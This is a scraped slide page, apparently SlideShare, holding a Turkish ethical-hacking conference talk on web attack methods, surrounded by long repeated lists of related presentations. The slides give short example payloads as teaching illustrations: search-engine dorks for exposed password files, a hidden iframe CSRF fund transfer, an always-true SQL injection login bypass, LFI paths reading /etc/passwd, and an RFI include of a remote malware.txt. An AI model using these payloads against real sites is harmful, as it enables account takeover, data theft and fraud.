Siber Dünyada Modern Arka KapılarSiber Dünyada Modern Arka Kapılar
Siber Dünyada Modern Arka Kapılar
BGA Cyber Security
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
BGA Cyber Security
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
BGA Cyber Security
Sızma Testleri Sonuç Raporu
Sızma Testleri Sonuç RaporuSızma Testleri Sonuç Raporu
Sızma Testleri Sonuç Raporu
BGA Cyber Security
VERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİVERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİ
BGA Cyber Security
WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ
BGA Cyber Security
Kablosuz Ağlara Yapılan Saldırılar
Kablosuz Ağlara Yapılan SaldırılarKablosuz Ağlara Yapılan Saldırılar
Kablosuz Ağlara Yapılan Saldırılar
BGA Cyber Security
Metasploit Framework Eğitimi
Metasploit Framework EğitimiMetasploit Framework Eğitimi
Metasploit Framework Eğitimi
BGA Cyber Security
PAROLA KIRMA SALDIRILARI
PAROLA KIRMA SALDIRILARIPAROLA KIRMA SALDIRILARI
PAROLA KIRMA SALDIRILARI
BGA Cyber Security
SIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMASIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMA
BGA Cyber Security
PORT TARAMA ve KEŞİF ÇALIŞMALARI
PORT TARAMA ve KEŞİF ÇALIŞMALARI PORT TARAMA ve KEŞİF ÇALIŞMALARI
PORT TARAMA ve KEŞİF ÇALIŞMALARI
BGA Cyber Security
GÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMAGÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMA
BGA Cyber Security
Bilge adam beşiktas şube ceh 2 hacking
Bilge adam beşiktas şube ceh 2 hackingBilge adam beşiktas şube ceh 2 hacking
Bilge adam beşiktas şube ceh 2 hacking
EPICROUTERS
Atilim üniversitesi ceh sunum
Atilim üniversitesi ceh sunumAtilim üniversitesi ceh sunum
Atilim üniversitesi ceh sunum
EPICROUTERS
x86 Mimarisi ve Tersine Mühendislik
x86 Mimarisi ve Tersine Mühendislikx86 Mimarisi ve Tersine Mühendislik
x86 Mimarisi ve Tersine Mühendislik
canyoupwn.me
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuNmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Mehmet Caner Köroğlu
İnternet Üzerinde Anonimlik ve Tespit Yöntemleri
İnternet Üzerinde Anonimlik ve Tespit Yöntemleriİnternet Üzerinde Anonimlik ve Tespit Yöntemleri
İnternet Üzerinde Anonimlik ve Tespit Yöntemleri
BGA Cyber Security
Siber Dünyada Modern Arka Kapılar
Siber Dünyada Modern Arka KapılarSiber Dünyada Modern Arka Kapılar
Siber Dünyada Modern Arka Kapılar
BGA Cyber Security
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
BGA Cyber Security
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
BGA Cyber Security
Sızma Testleri Sonuç Raporu
Sızma Testleri Sonuç RaporuSızma Testleri Sonuç Raporu
Sızma Testleri Sonuç Raporu
BGA Cyber Security
VERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİVERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİ
BGA Cyber Security
WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ
BGA Cyber Security
Kablosuz Ağlara Yapılan Saldırılar
Kablosuz Ağlara Yapılan SaldırılarKablosuz Ağlara Yapılan Saldırılar
Kablosuz Ağlara Yapılan Saldırılar
BGA Cyber Security
Metasploit Framework Eğitimi
Metasploit Framework EğitimiMetasploit Framework Eğitimi
Metasploit Framework Eğitimi
BGA Cyber Security
PAROLA KIRMA SALDIRILARI
PAROLA KIRMA SALDIRILARIPAROLA KIRMA SALDIRILARI
PAROLA KIRMA SALDIRILARI
BGA Cyber Security

Similar to Web Guvenligi Konferansi - Web Hacking Yontemleri (20)

Web Uygulama Güven(siz)liği
Web Uygulama Güven(siz)liğiWeb Uygulama Güven(siz)liği
Web Uygulama Güven(siz)liği
BGA Cyber Security
Owasp top 10 inceleme
Owasp top 10 incelemeOwasp top 10 inceleme
Owasp top 10 inceleme
Cyber-Warrior.org
Dogus University-Web Application Security
Dogus University-Web Application SecurityDogus University-Web Application Security
Dogus University-Web Application Security
mtimur
Web Hacking
Web HackingWeb Hacking
Web Hacking
Kale Siber Akademi
Zed attack-proxy-web
Zed attack-proxy-webZed attack-proxy-web
Zed attack-proxy-web
Barkın Kılıç
Sql Injection
Sql Injection Sql Injection
Sql Injection
Mehmet Tuncer
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
Murat KARA
Web servisi güvenliği
Web servisi güvenliğiWeb servisi güvenliği
Web servisi güvenliği
Emrah Gürcan
Gazi Universitesi Bilisim Gunleri '09
Gazi Universitesi Bilisim Gunleri '09Gazi Universitesi Bilisim Gunleri '09
Gazi Universitesi Bilisim Gunleri '09
Onur YILMAZ
Burp Suite İle File Upload Attack | OWASP Istanbul
Burp Suite İle File Upload Attack | OWASP Istanbul Burp Suite İle File Upload Attack | OWASP Istanbul
Burp Suite İle File Upload Attack | OWASP Istanbul
Rumeysa Bozdemir
Temel web güvenliği
Temel web güvenliğiTemel web güvenliği
Temel web güvenliği
Serdar Buyuktemiz
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıSiber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
BGA Cyber Security
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİCRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
Tulay Candar
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİCRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH
Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14
Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14
Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14
Siber Güvenlik Derneği
PHPkonf'15 - PHP Uygulamanızı Güçlendirin
PHPkonf'15 - PHP Uygulamanızı GüçlendirinPHPkonf'15 - PHP Uygulamanızı Güçlendirin
PHPkonf'15 - PHP Uygulamanızı Güçlendirin
Muhittin Özer
Ozgur web teknolojileri'13
Ozgur web teknolojileri'13Ozgur web teknolojileri'13
Ozgur web teknolojileri'13
Mehmet Ince
Spring&IOC-DC
Spring&IOC-DCSpring&IOC-DC
Spring&IOC-DC
saydin_soft
Balkanay Web Sunum
Balkanay Web SunumBalkanay Web Sunum
Balkanay Web Sunum
eroglu
Web Uygulama Pentest Eğitimi
Web Uygulama Pentest EğitimiWeb Uygulama Pentest Eğitimi
Web Uygulama Pentest Eğitimi
BGA Cyber Security
Web Uygulama Güven(siz)liği
Web Uygulama Güven(siz)liğiWeb Uygulama Güven(siz)liği
Web Uygulama Güven(siz)liği
BGA Cyber Security
Owasp top 10 inceleme
Owasp top 10 incelemeOwasp top 10 inceleme
Owasp top 10 inceleme
Cyber-Warrior.org
Dogus University-Web Application Security
Dogus University-Web Application SecurityDogus University-Web Application Security
Dogus University-Web Application Security
mtimur
Web Hacking
Web HackingWeb Hacking
Web Hacking
Kale Siber Akademi
Zed attack-proxy-web
Zed attack-proxy-webZed attack-proxy-web
Zed attack-proxy-web
Barkın Kılıç
Sql Injection
Sql Injection Sql Injection
Sql Injection
Mehmet Tuncer
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
Murat KARA
Web servisi güvenliği
Web servisi güvenliğiWeb servisi güvenliği
Web servisi güvenliği
Emrah Gürcan
Gazi Universitesi Bilisim Gunleri '09
Gazi Universitesi Bilisim Gunleri '09Gazi Universitesi Bilisim Gunleri '09
Gazi Universitesi Bilisim Gunleri '09
Onur YILMAZ
Burp Suite İle File Upload Attack | OWASP Istanbul
Burp Suite İle File Upload Attack | OWASP Istanbul Burp Suite İle File Upload Attack | OWASP Istanbul
Burp Suite İle File Upload Attack | OWASP Istanbul
Rumeysa Bozdemir
Temel web güvenliği
Temel web güvenliğiTemel web güvenliği
Temel web güvenliği
Serdar Buyuktemiz
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıSiber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
BGA Cyber Security
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİCRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
Tulay Candar
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİCRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH
Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14
Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14
Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14
Siber Güvenlik Derneği
PHPkonf'15 - PHP Uygulamanızı Güçlendirin
PHPkonf'15 - PHP Uygulamanızı GüçlendirinPHPkonf'15 - PHP Uygulamanızı Güçlendirin
PHPkonf'15 - PHP Uygulamanızı Güçlendirin
Muhittin Özer
Ozgur web teknolojileri'13
Ozgur web teknolojileri'13Ozgur web teknolojileri'13
Ozgur web teknolojileri'13
Mehmet Ince
Spring&IOC-DC
Spring&IOC-DCSpring&IOC-DC
Spring&IOC-DC
saydin_soft
Balkanay Web Sunum
Balkanay Web SunumBalkanay Web Sunum
Balkanay Web Sunum
eroglu
Web Uygulama Pentest Eğitimi
Web Uygulama Pentest EğitimiWeb Uygulama Pentest Eğitimi
Web Uygulama Pentest Eğitimi
BGA Cyber Security

Web Guvenligi Konferansi - Web Hacking Yontemleri

  • 2. Bilgi Teknolojileri Güvenlik Danışmanı • White Hat Hacker • Ethical Hacking Eğitmeni • Blog Yazarı (www.eyupcelik.com.tr) • Web Güvenliği Editörü (www.webguvenligi.net) • LabSec Community - Güvenlik Ekip Lideri • Anatolia Security - Proje Takım Lideri • Güvenlik Araştırmacısı (Security Research) – PacketStormSecurity.org – Exploit-db.com – Secunia.com
  • 3. Web Hacking Yöntemleri • Bilgi Toplama • Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi • Hata Mesajlarından Bilgi Toplama • Arama Motorlarından Bilgi Toplama • Alt Dizin ve Admin Panel Keşfi • Web Güvenlik Testlerinde Kişisel Proxyler • OWASP Top 10 Açıklık Rehberi • XSS, CSRF Açıkları ve Kötüye Kullanımı • XSS, CSRF Nedir? • XSS, CSRF Kullanımı • SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları • SQL Injection ve Blind SQL Injection Nedir? • SQL – Blind SQL Kullanımı • SQL Injection Örnekleri • Arama Motorlarından Zafiyet Arama • Havij, Sqlmap, SQL Finder, Pangolin • File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları • Local File Inclusion (LFI) • Remote File Inclusion (RFI) • Web Shell • Web Shell Kavramları ve Kullanım Amaçları • PHP, ASP, JSP, ASP.NET Shell Çeşitleri
  • 8. Sık karşılaşılan hata kodları • 400 (Söz dizimi çözülemedi) • 403 (Yasak) • 404 (Bulunamadı) • 405 (Yönteme izin verilmiyor) • 500 (Dahili sunucu hatası) • 505 (HTTP sürümü desteklenmiyor)
  • 9. • www.archive.org (Web Arşiv) • www.google.com • site: eyupcelik.com.tr • Filetype:txt • Password 123123 filetype:xml • Password 123123 filetype:xml site:site.com.tr • intitle:index.of • Intitle:index.of site:gov.tr • intitle:index.of pwd.db passwd site:com • Microsoft-IIS/5.0 server at • Apache/2.2 Server at • www.bing.com • IP: 192.168.1.100 • Kariyer Siteleri • (Kariyer.net, yenibiris.com. SecretCV)
  • 12. Web Hacking Yöntemleri • Bilgi Toplama • Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi • Hata Mesajlarından Bilgi Toplama • Arama Motorlarından Bilgi Toplama • Alt Dizin ve Admin Panel Keşfi • Web Güvenlik Testlerinde Kişisel Proxyler • OWASP Top 10 Açıklık Rehberi • XSS, CSRF Açıkları ve Kötüye Kullanımı • XSS, CSRF Nedir? • XSS, CSRF Kullanımı • SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları • SQL Injection ve Blind SQL Injection Nedir? • SQL – Blind SQL Kullanımı • SQL Injection Örnekleri • Arama Motorlarından Zafiyet Arama • Havij, Sqlmap, SQL Finder, Pangolin • File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları • Local File Inclusion (LFI) • Remote File Inclusion (RFI) • Web Shell • Web Shell Kavramları ve Kullanım Amaçları • PHP, ASP, JSP, ASP.NET Shell Çeşitleri
  • 14. Sunucuya gönderilen yazılım betiklerinin (script) kullanıcının tarayıcısında çalıştığı bir saldırı türüdür. • PHP-ASP-ASP.NET Sayfalarında sıklıkla görülür. • Genellikle POST ve GET metotlarının kullanıldığı alanlarda olur. • Yazılım betiklerinin kullanıcı tarafında çalıştırılması sonucunda oturum bilgileri çalınabilir, bilgisayarına zararlı kodlar enjekte edilebilir ve bilgisayar yönetimi ele geçirilebilir. • En çok karşılaşılan güvenlik zafiyetidir!
  • 15. • XSS • Reflected XSS Attack • Stored (Persistent) XSS Attack
  • 16. URL adreslerindeki querystringler ve form alanlarında sıklıkla görülür. • En çok karşılaşılan XSS saldırı türevidir. • Kullanıcı taraflı çalışır. • Phishing saldırılarına zemin oluşturur.
  • 17. • Forumlar, ziyaretçi defterleri gibi alanlarda sıklıkla görülür. • XSS kodları database sunucusuna kaydedilir. • Kullanıcılar sayfaya eriştiklerinde XSS kodları çalışır ve amaca hizmet eder.
  • 18. • XSS saldırısına benzer • Web uygulamasının oturum zaman aşımlarını kullanmamasından kaynaklanır. • XSS saldırılarının aksine CSRF saldırıları kullanıcı bazlıdır. • Bu saldırı türünde, kullanıcının isteği dışında kullanıcıya işlemler yaptırılır. • Banka hesaplarından para transferi, uygulama yetki yükseltme saldırıları gibi bir çok işlem bu saldırı yöntemi ile yapılabilmektedir. • Saldırganın amacı; yetkisi olmayan alanlarda istediği işlemi yetkisi olan bir kullanıcıya yaptırmaktır. • Örneğin; ING Direct bankasında bulunan CSRF zafiyeti, kullanıcının belirtilen hesaba para transfer etmesini sağlamaktaydı.
  • 19. • Web sitesinde oturum açan bir kullanıcı, eğer aynı zamanda zararlı kodun bulunduğu sayfaya erişirse, hesabından başka bir hesaba para aktarılıyor • Kullanıcı uygulamayı açtıktan sonra, zararlı sayfada http://www.banka.com/ParaYollar.php?Gonderen=Eyup&Alici=Ismail&Miktar=500 &submit=1 kodu çalıştırılır. • Bunun için saldırgan yukarıda bulunan kodu sayfasında <img> veya <iframe> tagları arasına yerleştirir. • Bu tagler kullanıcının görmemesi için <img src=/EPICROUTERS/web-guvenligi-konferansi-web-hacking-yontemleri/‚http:/www.banka.com/ParaYollar.php?Gonderen=Eyup&Alici=Ismail&Miktar=500&submit=1‛ width=‚0‛ height=‚0‛> şeklinde yada <iframe src=/EPICROUTERS/web-guvenligi-konferansi-web-hacking-yontemleri/‚http:/www.banka.com/ParaYollar.php?Gonderen=Eyup&Alici=Ismail&Miktar=500&submit=1‛ width=‚0‛ height=‚0‛> şeklinde olacaktır. • Bu kodlar kullanıcı tarafında çalışınca, Eyup adlı kullanıcın hesabından Ismail adlı kullanıcın hesabına 500 TL aktarmış olacaktır.
  • 20. Web Hacking Yöntemleri • Bilgi Toplama • Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi • Hata Mesajlarından Bilgi Toplama • Arama Motorlarından Bilgi Toplama • Alt Dizin ve Admin Panel Keşfi • Web Güvenlik Testlerinde Kişisel Proxyler • OWASP Top 10 Açıklık Rehberi • XSS, CSRF Açıkları ve Kötüye Kullanımı • XSS, CSRF Nedir? • XSS, CSRF Kullanımı • SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları • SQL Injection ve Blind SQL Injection Nedir? • SQL – Blind SQL Kullanımı • SQL Injection Örnekleri • Arama Motorlarından Zafiyet Arama • Havij, Sqlmap, SQL Finder, Pangolin • File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları • Local File Inclusion (LFI) • Remote File Inclusion (RFI) • Web Shell • Web Shell Kavramları ve Kullanım Amaçları • PHP, ASP, JSP, ASP.NET Shell Çeşitleri
  • 21. • Veritabanından sorgulamalar yapılırken, sorgulara bazı karakterlerin (‘) eklenerek yetkisiz sorgulamalar yapılmasıdır. • SQL injection yöntemi ile sql sunucusunda bulunan verilere erişilebilir, değiştirilebilir , silinebilir • SQL Injection son zamanlarda en tehlikeli saldırı türlerinden biri haline geldi. • Web uygulamalarında bulunan SQL sorgularının doğru bir şekilde analiz edilmeden SQL sunucusuna aktarılmasından kaynaklanan bir saldırı türüdü • SQL’de iki tek tırnak (‘) yan yana gelince arada bulunan kodlar ‚string‛ olarak kabul edilir. • Örneğin; bir userın form alanına giriş yapacağı zaman girmiş olduğu input değerler kontrol edilirken sql cümlecikleri kullanılır. • SELECT * from kullanicilar where isim=‘eyup’ and sifre=‘x9x9’ • Böyle bir durumda, kullanıcılar tablosunda bulunan isim kolonunda ‚eyup‛ varsa ve sifre kolonıundaki şifresi de eğer ‚x9x9‛ ise kullanıcı oturum açmış olacaktır. • Kullanıcının form alanına girmiş olduğu input veriler where koşuluna atanmaktadır.
  • 22. • Bu mantıkla çalışan bir sitede sql injection saldırısı yapacaksak eğer, bize kullanıcı adı ve şifreyi her zaman döndürecek bir koda ihityacımız olacaktır. • Select * from kullanicilar where isim=‘’ OR ‘’ = ‘’ and sifre= ‘’ OR ‘’ = ‘’ • Kullanıcılar tablosundaki isim kolonu ve sifre kolonu boş olan kullanıcıları istemiş olduk.
  • 23. • ODBC (Open Database Connectivity) verikaynakları üzerinde veri taşımaya yarayan bir araçtır. • Bu işlemi verikaynağı ve uygulama arasında bir katman oluşturarak gerçekleştirir. • Error Based SQL Injection saldırıları, ODBC’nin verdiği hatalardan faydalanarak verilere erişmeye çalışır. • Çoğunlukla SQL Union operatöründen faydalanılarak bu hata verilerine erişilir.
  • 24. • SQL injectionda kullanılan karakterlerin sonuç vermediği durumlarda kullanılan bir saldırı yöntemidir. • Bu yöntem alınan hataların True veya False kısmı ile ilgilenir. • SQL üzerinde yapılan sorgulamaların doğru veya yanlış olduğu sonuçlarını bize geri döndürür. • Blind SQL Injection ile yapılan yöntemler deneme-yanılma yöntemi ile yapılır.
  • 28. Web Hacking Yöntemleri • Bilgi Toplama • Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi • Hata Mesajlarından Bilgi Toplama • Arama Motorlarından Bilgi Toplama • Alt Dizin ve Admin Panel Keşfi • Web Güvenlik Testlerinde Kişisel Proxyler • OWASP Top 10 Açıklık Rehberi • XSS, CSRF Açıkları ve Kötüye Kullanımı • XSS, CSRF Nedir? • XSS, CSRF Kullanımı • SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları • SQL Injection ve Blind SQL Injection Nedir? • SQL – Blind SQL Kullanımı • SQL Injection Örnekleri • Arama Motorlarından Zafiyet Arama • Havij, Sqlmap, SQL Finder, Pangolin • File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları • Local File Inclusion (LFI) • Remote File Inclusion (RFI) • Web Shell • Web Shell Kavramları ve Kullanım Amaçları • PHP, ASP, JSP, ASP.NET Shell Çeşitleri
  • 29. Web sitesinde bulunan kodlama hatalarından (include, require) meydana gelir • Sunucuda bulunan dosyaların çağrılmasına ve okunabilmesine olanak verir • Sadece bulunduğu siteyi değil, sunucuda bulunan tüm siteleri etkileyebilir! • index.php?SayfaAc=iletisim.php • index.php?SayfaAc=../../configuration.php • index.php?SayfaAc=../../../../etc/passwd • index.php?SayfaAc=../../../boot.ini
  • 30. • Web sitesinde bulunan kodlama hatalarından (include, require) meydana gelir • RFI saldırılarında en büyük etken değişkene değer atanmamasıdır! • Tanımlanmış ancak değer atanmamış olan değişkene dışardan değer aktarılması ile oluşur. • Sadece bulunduğu siteyi değil, sunucuda bulunan tüm siteleri etkileyebilir! • include($deger‛.php‛) • index.php?deger=http://www.site.com/malware.txt